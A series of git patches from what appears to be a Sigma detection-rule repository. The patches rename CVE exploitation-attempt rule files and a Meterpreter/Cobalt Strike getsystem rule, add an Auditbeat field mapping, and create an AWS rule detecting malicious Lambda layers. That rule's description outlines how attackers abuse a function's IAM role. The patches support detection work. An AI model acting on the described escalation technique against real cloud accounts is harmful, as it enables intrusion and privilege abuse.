...ion_attempt.yml => web_cve_2010_1471_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1472_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1473_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1474_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1475_exploitation_attempt.yml} | 0 22 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => aws}/aws_suspicious_saml_activity.yml (100%) rename rules/web/{web_cve-2010-0943_exploitation_attempt.yml => web_cve_2010_0943_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-0944_exploitation_attempt.yml => web_cve_2010_0944_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-0985_exploitation_attempt.yml => web_cve_2010_0985_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1219_exploitation_attempt.yml => web_cve_2010_1219_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1304_exploitation_attempt.yml => web_cve_2010_1304_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1305_exploitation_attempt.yml => web_cve_2010_1305_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1306_exploitation_attempt.yml => web_cve_2010_1306_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1307_exploitation_attempt.yml => web_cve_2010_1307_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1308_exploitation_attempt.yml => web_cve_2010_1308_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1312_exploitation_attempt.yml => web_cve_2010_1312_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1313_exploitation_attempt.yml => web_cve_2010_1313_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1314_exploitation_attempt.yml => web_cve_2010_1314_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1345_exploitation_attempt.yml => web_cve_2010_1345_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1353_exploitation_attempt.yml => web_cve_2010_1353_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1354_exploitation_attempt.yml => web_cve_2010_1354_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1470_exploitation_attempt.yml => web_cve_2010_1470_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1471_exploitation_attempt.yml => web_cve_2010_1471_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1472_exploitation_attempt.yml => web_cve_2010_1472_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1473_exploitation_attempt.yml => web_cve_2010_1473_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1474_exploitation_attempt.yml => web_cve_2010_1474_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1475_exploitation_attempt.yml => web_cve_2010_1475_exploitation_attempt.yml} (100%) diff --git a/rules/cloud/aws_suspicious_saml_activity.yml b/rules/cloud/aws/aws_suspicious_saml_activity.yml similarity index 100% rename from rules/cloud/aws_suspicious_saml_activity.yml rename to rules/cloud/aws/aws_suspicious_saml_activity.yml diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yml b/rules/web/web_cve_2010_0943_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0943_exploitation_attempt.yml rename to rules/web/web_cve_2010_0943_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yml b/rules/web/web_cve_2010_0944_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0944_exploitation_attempt.yml rename to rules/web/web_cve_2010_0944_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yml b/rules/web/web_cve_2010_0985_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0985_exploitation_attempt.yml rename to rules/web/web_cve_2010_0985_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yml b/rules/web/web_cve_2010_1219_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1219_exploitation_attempt.yml rename to rules/web/web_cve_2010_1219_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yml b/rules/web/web_cve_2010_1304_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1304_exploitation_attempt.yml rename to rules/web/web_cve_2010_1304_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yml b/rules/web/web_cve_2010_1305_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1305_exploitation_attempt.yml rename to rules/web/web_cve_2010_1305_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yml b/rules/web/web_cve_2010_1306_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1306_exploitation_attempt.yml rename to rules/web/web_cve_2010_1306_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yml b/rules/web/web_cve_2010_1307_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1307_exploitation_attempt.yml rename to rules/web/web_cve_2010_1307_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yml b/rules/web/web_cve_2010_1308_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1308_exploitation_attempt.yml rename to rules/web/web_cve_2010_1308_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yml b/rules/web/web_cve_2010_1312_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1312_exploitation_attempt.yml rename to rules/web/web_cve_2010_1312_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yml b/rules/web/web_cve_2010_1313_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1313_exploitation_attempt.yml rename to rules/web/web_cve_2010_1313_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yml b/rules/web/web_cve_2010_1314_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1314_exploitation_attempt.yml rename to rules/web/web_cve_2010_1314_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yml b/rules/web/web_cve_2010_1345_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1345_exploitation_attempt.yml rename to rules/web/web_cve_2010_1345_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yml b/rules/web/web_cve_2010_1353_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1353_exploitation_attempt.yml rename to rules/web/web_cve_2010_1353_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yml b/rules/web/web_cve_2010_1354_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1354_exploitation_attempt.yml rename to rules/web/web_cve_2010_1354_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yml b/rules/web/web_cve_2010_1470_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1470_exploitation_attempt.yml rename to rules/web/web_cve_2010_1470_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yml b/rules/web/web_cve_2010_1471_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1471_exploitation_attempt.yml rename to rules/web/web_cve_2010_1471_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yml b/rules/web/web_cve_2010_1472_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1472_exploitation_attempt.yml rename to rules/web/web_cve_2010_1472_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yml b/rules/web/web_cve_2010_1473_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1473_exploitation_attempt.yml rename to rules/web/web_cve_2010_1473_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yml b/rules/web/web_cve_2010_1474_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1474_exploitation_attempt.yml rename to rules/web/web_cve_2010_1474_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yml b/rules/web/web_cve_2010_1475_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1475_exploitation_attempt.yml rename to rules/web/web_cve_2010_1475_exploitation_attempt.yml From aa96f21d0f380fdb60b77d164c2599ad2b8343de Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 23 Sep 2021 14:52:56 +0200 Subject: [PATCH 1087/1367] fix filename --- ...ity_meterpreter_or_cobaltstrike_getsystem_service_install.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/builtin/{win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml => win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml} (100%) diff --git a/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml similarity index 100% rename from rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml rename to rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml From 35a710eec66f0cb4e0622b5d310800a185d84019 Mon Sep 17 00:00:00 2001 From: Steven Date: Thu, 23 Sep 2021 14:59:51 +0200 Subject: [PATCH 1088/1367] Added configuration for auditbeat, mapping to Elastic ECS --- tools/config/auditbeat.yml | 252 +++++++++++++++++++++++++++++++++++++ 1 file changed, 252 insertions(+) create mode 100644 tools/config/auditbeat.yml diff --git a/tools/config/auditbeat.yml b/tools/config/auditbeat.yml new file mode 100644 index 00000000..ae3e7788 --- /dev/null +++ b/tools/config/auditbeat.yml @@ -0,0 +1,252 @@ +title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules +order: 20 +backends: + - es-qs + - es-dsl + - es-rule + - es-rule-eql + - es-eql + - kibana + - kibana-ndjson + - xpack-watcher + - elastalert + - elastalert-dsl + - ee-outliers + +logsources: + linux_auditd: + product: linux + service: auditd + conditions: + event.provider: auditd + +defaultindex: auditbeat-* + +fieldmappings: + # https://www.elastic.co/guide/en/beats/auditbeat/current/exported-fields-auditd.html + a0: auditd.data.a0 + a1: auditd.data.a1 + a2: auditd.data.a2 + a3: auditd.data.a3 + acct: auditd.data.acct + acl: auditd.data.acl + action: auditd.data.action + added: auditd.data.added + addr: auditd.data.socket.addr + apparmor: auditd.data.apparmor + arch: auditd.data.arch + argc: auditd.data.argc + audit_backlog_limit: auditd.data.audit_backlog_limit + audit_backlog_wait_time: auditd.data.audit_backlog_wait_time + audit_enabled: auditd.data.audit_enabled + audit_failure: auditd.data.audit_failure + auid: user.auid + banners: auditd.data.banners + bool: auditd.data.bool + bus: auditd.data.bus + capability: auditd.data.capability + cap_fe: auditd.data.cap_fe + cap_fi: auditd.data.cap_fi + cap_fp: auditd.data.cap_fp + cap_fver: auditd.data.cap_fver + cap_pa: auditd.data.cap_pa + cap_pe: auditd.data.cap_pe + cap_pi: auditd.data.cap_pi + cap_pp: auditd.data.cap_pp + category: user.selinux.category + cgroup: auditd.data.cgroup + changed: auditd.data.changed + cipher: auditd.data.cipher + class: auditd.data.class + cmd: auditd.data.cmd + code: auditd.data.code + comm: auditd.data.comm + compat: auditd.data.compat + cwd: process.cwd + daddr: auditd.data.daddr + data: auditd.data.data + default-context: auditd.data.default-context + dev: auditd.paths.dev + device: auditd.data.device + dir: auditd.data.dir + direction: auditd.data.direction + dmac: auditd.data.dmac + dport: auditd.data.dport + enforcing: auditd.data.enforcing + entries: auditd.data.entries + exe: process.executable + exit: auditd.data.exit + fam: auditd.data.fam + family: auditd.data.family + fd: auditd.data.fd + file: auditd.data.file + flags: auditd.data.flags + fe: auditd.data.fe + feature: auditd.data.feature + fi: auditd.data.fi + fp: auditd.data.fp + format: auditd.data.format + fsgid: user.fsgid + fsuid: user.fsuid + fver: auditd.data.fver + gid: user.gid + grantors: auditd.data.grantors + grp: auditd.data.grp + hook: auditd.data.hook + hostname: auditd.data.hostname + icmp_type: auditd.data.icmp_type + id: auditd.data.id + igid: auditd.data.igid + Image: + img-ctx: auditd.data.img-ctx + inif: auditd.data.inif + ip: auditd.data.ip + ipid: auditd.data.ipid + ino: auditd.data.ino + inode: auditd.paths.inode + inode_gid: auditd.data.inode_gid + inode_uid: auditd.data.inode_uid + invalid_context: auditd.data.invalid_context + ioctlcmd: auditd.data.ioctlcmd + ipx-net: auditd.data.ipx-net + item: auditd.paths.item + items: auditd.data.items + iuid: auditd.data.iuid + kernel: auditd.data.kernel + kind: auditd.data.kind + ksize: auditd.data.ksize + laddr: auditd.data.laddr + len: auditd.data.len + lport: auditd.data.lport + list: auditd.data.list + mac: auditd.data.mac + macproto: auditd.data.macproto + maj: auditd.data.maj + major: auditd.data.major + minor: auditd.data.minor + mode: auditd.paths.mode + model: auditd.data.model + msg: auditd.data.msg + nargs: auditd.data.nargs + name: auditd.paths.name + nametype: auditd.paths.nametype + net: auditd.data.net + new: auditd.data.new + new-chardev: auditd.data.new-chardev + new-disk: auditd.data.new-disk + new-enabled: auditd.data.new-enabled + new-fs: auditd.data.new-fs + new_gid: auditd.data.new_gid + new-level: auditd.data.new-level + new_lock: auditd.data.new_lock + new-log_passwd: auditd.data.new-log_passwd + new-mem: auditd.data.new-mem + new-net: auditd.data.new-net + new_pe: auditd.data.new_pe + new_pi: auditd.data.new_pi + new_pp: auditd.data.new_pp + new-range: auditd.data.new-range + new-rng: auditd.data.new-rng + new-role: auditd.data.new-role + new-seuser: auditd.data.new-seuser + new-vcpu: auditd.data.new-vcpu + nlnk-fam: auditd.data.nlnk-fam + nlnk-grp: auditd.data.nlnk-grp + nlnk-pid: auditd.data.nlnk-pid + oauid: auditd.data.oauid + obj: auditd.data.obj + obj_gid: auditd.data.obj_gid + obj_uid: auditd.data.obj_uid + oflag: auditd.data.oflag + ogid: auditd.paths.ogid + ocomm: auditd.data.ocomm + old: auditd.data.old + old-auid: auditd.data.old-auid + old-chardev: auditd.data.old-chardev + old-disk: auditd.data.old-disk + old-enabled: auditd.data.old-enabled + old_enforcing: auditd.data.old_enforcing + old-fs: auditd.data.old-fs + old-level: auditd.data.old-level + old_lock: auditd.data.old_lock + old-log_passwd: auditd.data.old-log_passwd + old-mem: auditd.data.old-mem + old-net: auditd.data.old-net + old_pa: auditd.data.old_pa + old_pe: auditd.data.old_pe + old_pi: auditd.data.old_pi + old_pp: auditd.data.old_pp + old_prom: auditd.data.old_prom + old-range: auditd.data.old-range + old-rng: auditd.data.old-rng + old-role: auditd.data.old-role + old-ses: auditd.data.old-ses + old-seuser: auditd.data.old-seuser + old_val: auditd.data.old_val + old-vcpu: auditd.data.old-vcpu + op: auditd.data.op + opid: auditd.data.opid + oses: auditd.data.oses + ouid: auditd.paths.ouid + outif: auditd.data.outif + parent: auditd.data.parent + path: source.path + per: auditd.data.per + perm: auditd.data.perm + perm_mask: auditd.data.perm_mask + permissive: auditd.data.permissive + pfs: auditd.data.pfs + printer: auditd.data.printer + prom: auditd.data.prom + proctitle: proctitle + proto: auditd.data.proto + qbytes: auditd.data.qbytes + range: auditd.data.range + rdev: auditd.paths.rdev + reason: auditd.data.reason + removed: auditd.data.removed + res: auditd.data.res + resrc: auditd.data.resrc + result: auditd.result + role: user.selinux.role + rport: auditd.data.rport + saddr: auditd.data.socket.saddr + sauid: auditd.data.sauid + scontext: auditd.data.scontext + selected-context: auditd.data.selected-context + seperm: auditd.data.seperm + seqno: auditd.data.seqno + seperms: auditd.data.seperms + seresult: auditd.data.seresult + ses: auditd.data.ses + seuser: auditd.data.seuser + sgid: user.sgid + sig: auditd.data.sig + sigev_signo: auditd.data.sigev_signo + smac: auditd.data.smac + spid: auditd.data.spid + sport: auditd.data.sport + state: auditd.data.state + subj: auditd.data.subj + success: auditd.data.success + suid: user.suid + syscall: auditd.data.syscall + table: auditd.data.table + TargetFileName: auditd.data.file + tclass: auditd.data.tclass + tcontext: auditd.data.tcontext + terminal: auditd.data.terminal + tty: auditd.data.tty + type: user.selinux.domain + uid: user.uid + unit: auditd.data.unit + uri: auditd.data.uri + user: user.selinux.user + uuid: auditd.data.uuid + val: auditd.data.val + ver: auditd.data.ver + virt: auditd.data.virt + vm: auditd.data.vm + vm-ctx: auditd.data.vm-ctx + vm-pid: auditd.data.vm-pid + watch: auditd.data.watch From 9e9fd4c23d88d3752eeb04b1d0e14eed8793f5e4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 23 Sep 2021 08:37:20 -0500 Subject: [PATCH 1089/1367] Create aws_attached_malicious_lambda_layer.yml --- .../aws_attached_malicious_lambda_layer.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/aws/aws_attached_malicious_lambda_layer.yml diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml new file mode 100644 index 00000000..a57e61df --- /dev/null +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -0,0 +1,21 @@ +title: AWS Attached Malicious Lambda Layer +id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d +description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. +author: Austin Songer +status: experimental +date: 2021/09/23 +references: + - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html +logsource: + service: cloudtrail +detection: + selection: + eventSource: lambda.amazonaws.com + eventName: UpdateFunctionConfiguration + condition: selection +level: low +tags: + - attack.privilege_escalation +falsepositives: + - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From b9123422b8d0f97ae08833bef34e6448ad5088fe Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 23 Sep 2021 08:37:34 -0500 Subject: [PATCH 1090/1367] Delete aws_attached_malicious_lambda_layer.yml --- .../aws_attached_malicious_lambda_layer.yml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 rules/cloud/aws/aws_attached_malicious_lambda_layer.yml diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml deleted file mode 100644 index a57e61df..00000000 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ /dev/null @@ -1,21 +0,0 @@ -title: AWS Attached Malicious Lambda Layer -id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d -description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. -author: Austin Songer -status: experimental -date: 2021/09/23 -references: - - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html -logsource: - service: cloudtrail -detection: - selection: - eventSource: lambda.amazonaws.com - eventName: UpdateFunctionConfiguration - condition: selection -level: low -tags: - - attack.privilege_escalation -falsepositives: - - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From fdc45505e009654b00d4a3d7c801dac3fc5ed14c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 23 Sep 2021 08:38:02 -0500 Subject: [PATCH 1091/1367] Create aws_attached_malicious_lambda_layer.yml --- .../aws_attached_malicious_lambda_layer.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/aws/aws_attached_malicious_lambda_layer.yml diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml new file mode 100644 index 00000000..a57e61df --- /dev/null +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -0,0 +1,21 @@ +title: AWS Attached Malicious Lambda Layer +id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d +description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. +author: Austin Songer +status: experimental +date: 2021/09/23 +references: + - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html +logsource: + service: cloudtrail +detection: + selection: + eventSource: lambda.amazonaws.com + eventName: UpdateFunctionConfiguration + condition: selection +level: low +tags: + - attack.privilege_escalation +falsepositives: + - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 8203a2d5f2f1736d3471bee9f48e4ed51cad35e3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 23 Sep 2021 08:40:26 -0500 Subject: [PATCH 1092/1367] Update aws_attached_malicious_lambda_layer.yml --- rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml index a57e61df..39c92d70 100644 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -1,5 +1,5 @@ title: AWS Attached Malicious Lambda Layer -id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d +id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. author: Austin Songer status: experimental From bf1a8c24150f3753aff489152d7d51795eb90b8d Mon Sep 17 00:00:00 2001 From: Steven Date: Thu, 23 Sep 2021 18:56:29 +0200 Subject: [PATCH 1093/1367] Fix yamllint --- tools/config/auditbeat.yml | 465 ++++++++++++++++++------------------- 1 file changed, 232 insertions(+), 233 deletions(-) diff --git a/tools/config/auditbeat.yml b/tools/config/auditbeat.yml index ae3e7788..9251d711 100644 --- a/tools/config/auditbeat.yml +++ b/tools/config/auditbeat.yml @@ -1,4 +1,4 @@ -title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules +title: Elastic Auditbeat (from 7.x) index pattern and field mapping order: 20 backends: - es-qs @@ -14,239 +14,238 @@ backends: - ee-outliers logsources: - linux_auditd: - product: linux - service: auditd - conditions: - event.provider: auditd + linux_auditd: + product: linux + service: auditd + conditions: + event.provider: auditd defaultindex: auditbeat-* - + fieldmappings: # https://www.elastic.co/guide/en/beats/auditbeat/current/exported-fields-auditd.html - a0: auditd.data.a0 - a1: auditd.data.a1 - a2: auditd.data.a2 - a3: auditd.data.a3 - acct: auditd.data.acct - acl: auditd.data.acl - action: auditd.data.action - added: auditd.data.added - addr: auditd.data.socket.addr - apparmor: auditd.data.apparmor - arch: auditd.data.arch - argc: auditd.data.argc - audit_backlog_limit: auditd.data.audit_backlog_limit - audit_backlog_wait_time: auditd.data.audit_backlog_wait_time - audit_enabled: auditd.data.audit_enabled - audit_failure: auditd.data.audit_failure - auid: user.auid - banners: auditd.data.banners - bool: auditd.data.bool - bus: auditd.data.bus - capability: auditd.data.capability - cap_fe: auditd.data.cap_fe - cap_fi: auditd.data.cap_fi - cap_fp: auditd.data.cap_fp - cap_fver: auditd.data.cap_fver - cap_pa: auditd.data.cap_pa - cap_pe: auditd.data.cap_pe - cap_pi: auditd.data.cap_pi - cap_pp: auditd.data.cap_pp - category: user.selinux.category - cgroup: auditd.data.cgroup - changed: auditd.data.changed - cipher: auditd.data.cipher - class: auditd.data.class - cmd: auditd.data.cmd - code: auditd.data.code - comm: auditd.data.comm - compat: auditd.data.compat - cwd: process.cwd - daddr: auditd.data.daddr - data: auditd.data.data - default-context: auditd.data.default-context - dev: auditd.paths.dev - device: auditd.data.device - dir: auditd.data.dir - direction: auditd.data.direction - dmac: auditd.data.dmac - dport: auditd.data.dport - enforcing: auditd.data.enforcing - entries: auditd.data.entries - exe: process.executable - exit: auditd.data.exit - fam: auditd.data.fam - family: auditd.data.family - fd: auditd.data.fd - file: auditd.data.file - flags: auditd.data.flags - fe: auditd.data.fe - feature: auditd.data.feature - fi: auditd.data.fi - fp: auditd.data.fp - format: auditd.data.format - fsgid: user.fsgid - fsuid: user.fsuid - fver: auditd.data.fver - gid: user.gid - grantors: auditd.data.grantors - grp: auditd.data.grp - hook: auditd.data.hook - hostname: auditd.data.hostname - icmp_type: auditd.data.icmp_type - id: auditd.data.id - igid: auditd.data.igid - Image: - img-ctx: auditd.data.img-ctx - inif: auditd.data.inif - ip: auditd.data.ip - ipid: auditd.data.ipid - ino: auditd.data.ino - inode: auditd.paths.inode - inode_gid: auditd.data.inode_gid - inode_uid: auditd.data.inode_uid - invalid_context: auditd.data.invalid_context - ioctlcmd: auditd.data.ioctlcmd - ipx-net: auditd.data.ipx-net - item: auditd.paths.item - items: auditd.data.items - iuid: auditd.data.iuid - kernel: auditd.data.kernel - kind: auditd.data.kind - ksize: auditd.data.ksize - laddr: auditd.data.laddr - len: auditd.data.len - lport: auditd.data.lport - list: auditd.data.list - mac: auditd.data.mac - macproto: auditd.data.macproto - maj: auditd.data.maj - major: auditd.data.major - minor: auditd.data.minor - mode: auditd.paths.mode - model: auditd.data.model - msg: auditd.data.msg - nargs: auditd.data.nargs - name: auditd.paths.name - nametype: auditd.paths.nametype - net: auditd.data.net - new: auditd.data.new - new-chardev: auditd.data.new-chardev - new-disk: auditd.data.new-disk - new-enabled: auditd.data.new-enabled - new-fs: auditd.data.new-fs - new_gid: auditd.data.new_gid - new-level: auditd.data.new-level - new_lock: auditd.data.new_lock - new-log_passwd: auditd.data.new-log_passwd - new-mem: auditd.data.new-mem - new-net: auditd.data.new-net - new_pe: auditd.data.new_pe - new_pi: auditd.data.new_pi - new_pp: auditd.data.new_pp - new-range: auditd.data.new-range - new-rng: auditd.data.new-rng - new-role: auditd.data.new-role - new-seuser: auditd.data.new-seuser - new-vcpu: auditd.data.new-vcpu - nlnk-fam: auditd.data.nlnk-fam - nlnk-grp: auditd.data.nlnk-grp - nlnk-pid: auditd.data.nlnk-pid - oauid: auditd.data.oauid - obj: auditd.data.obj - obj_gid: auditd.data.obj_gid - obj_uid: auditd.data.obj_uid - oflag: auditd.data.oflag - ogid: auditd.paths.ogid - ocomm: auditd.data.ocomm - old: auditd.data.old - old-auid: auditd.data.old-auid - old-chardev: auditd.data.old-chardev - old-disk: auditd.data.old-disk - old-enabled: auditd.data.old-enabled - old_enforcing: auditd.data.old_enforcing - old-fs: auditd.data.old-fs - old-level: auditd.data.old-level - old_lock: auditd.data.old_lock - old-log_passwd: auditd.data.old-log_passwd - old-mem: auditd.data.old-mem - old-net: auditd.data.old-net - old_pa: auditd.data.old_pa - old_pe: auditd.data.old_pe - old_pi: auditd.data.old_pi - old_pp: auditd.data.old_pp - old_prom: auditd.data.old_prom - old-range: auditd.data.old-range - old-rng: auditd.data.old-rng - old-role: auditd.data.old-role - old-ses: auditd.data.old-ses - old-seuser: auditd.data.old-seuser - old_val: auditd.data.old_val - old-vcpu: auditd.data.old-vcpu - op: auditd.data.op - opid: auditd.data.opid - oses: auditd.data.oses - ouid: auditd.paths.ouid - outif: auditd.data.outif - parent: auditd.data.parent - path: source.path - per: auditd.data.per - perm: auditd.data.perm - perm_mask: auditd.data.perm_mask - permissive: auditd.data.permissive - pfs: auditd.data.pfs - printer: auditd.data.printer - prom: auditd.data.prom - proctitle: proctitle - proto: auditd.data.proto - qbytes: auditd.data.qbytes - range: auditd.data.range - rdev: auditd.paths.rdev - reason: auditd.data.reason - removed: auditd.data.removed - res: auditd.data.res - resrc: auditd.data.resrc - result: auditd.result - role: user.selinux.role - rport: auditd.data.rport - saddr: auditd.data.socket.saddr - sauid: auditd.data.sauid - scontext: auditd.data.scontext - selected-context: auditd.data.selected-context - seperm: auditd.data.seperm - seqno: auditd.data.seqno - seperms: auditd.data.seperms - seresult: auditd.data.seresult - ses: auditd.data.ses - seuser: auditd.data.seuser - sgid: user.sgid - sig: auditd.data.sig - sigev_signo: auditd.data.sigev_signo - smac: auditd.data.smac - spid: auditd.data.spid - sport: auditd.data.sport - state: auditd.data.state - subj: auditd.data.subj - success: auditd.data.success - suid: user.suid - syscall: auditd.data.syscall - table: auditd.data.table - TargetFileName: auditd.data.file - tclass: auditd.data.tclass - tcontext: auditd.data.tcontext - terminal: auditd.data.terminal - tty: auditd.data.tty - type: user.selinux.domain - uid: user.uid - unit: auditd.data.unit - uri: auditd.data.uri - user: user.selinux.user - uuid: auditd.data.uuid - val: auditd.data.val - ver: auditd.data.ver - virt: auditd.data.virt - vm: auditd.data.vm - vm-ctx: auditd.data.vm-ctx - vm-pid: auditd.data.vm-pid - watch: auditd.data.watch + a0: auditd.data.a0 + a1: auditd.data.a1 + a2: auditd.data.a2 + a3: auditd.data.a3 + acct: auditd.data.acct + acl: auditd.data.acl + action: auditd.data.action + added: auditd.data.added + addr: auditd.data.socket.addr + apparmor: auditd.data.apparmor + arch: auditd.data.arch + argc: auditd.data.argc + audit_backlog_limit: auditd.data.audit_backlog_limit + audit_backlog_wait_time: 